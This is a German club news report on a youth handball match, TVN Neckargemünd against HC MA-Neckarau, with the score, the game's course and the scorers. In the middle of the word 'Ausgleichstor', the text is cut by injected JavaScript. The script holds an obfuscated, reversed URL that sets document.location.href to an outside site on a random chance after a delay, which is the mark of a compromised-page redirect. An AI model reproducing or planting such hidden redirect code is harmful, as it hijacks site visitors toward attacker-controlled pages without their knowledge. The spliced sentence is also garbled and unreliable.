Das Spiel der männlichen A-Jugend des TVN gegen HC MA-Neckarau startete leider wie in den letzten Spielen auch erlebt: Immer wieder gelang es den Gegnern, die nicht stark genug auf Gegenwehr eingestellte Abwehr der Neckargemünder zu überrumpeln. Doch ein offensichtlich intensives Halbzeitbriefing durch den Trainer Alexander Kammler brachte dann doch das lange ersehnte „Abwehr-Comeback“. (TVN – HC MA-Neckarau 29 : 27 (15 : 19))
Neckargemünd, den 15.01.2017 (ama) – Schon in der ersten Spielminute legten die Neckarauer mit dem ersten Tor vor. Doch Felix Schaum konnte schon kurz nach einer Minute Spielzeit das Ausgleichstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor erzielen. Schwächen in der Abwehr ermöglichten es dann aber doch dem Gegner, ab der 11. Spielminute die erste Halbzeit bis zu einem Spielstand von 15:19 für sich auszubauen. Nach der Halbzeit dann endlich das schon lange erwartete Comeback der Neckargemünder. Die Abwehr war kaum wieder zu erkennen, so dass schon in der 38. Spielminute Gleichstand erzielt werden konnte. Bis in die letzten Minuten gab es dann ein Kopf-an-Kopf-Rennen, das jedoch dann Neckargemünd verdientermaßen mit je einem Tor von Sebastian Mohr und Nicolas Kammler für sich entscheiden konnte. Auch ist anzumerken, dass jeder Mitspieler mindestens 1 Tor realisieren konnte!
Es spielten:
Niklas und Tobias im Tor, Jordi (10), Sebastian (7), Felix (3), Johannes (2), Nicolas (2), Philipp (1), Samuel (1), Timothy (1), Hauke (1), Till (1)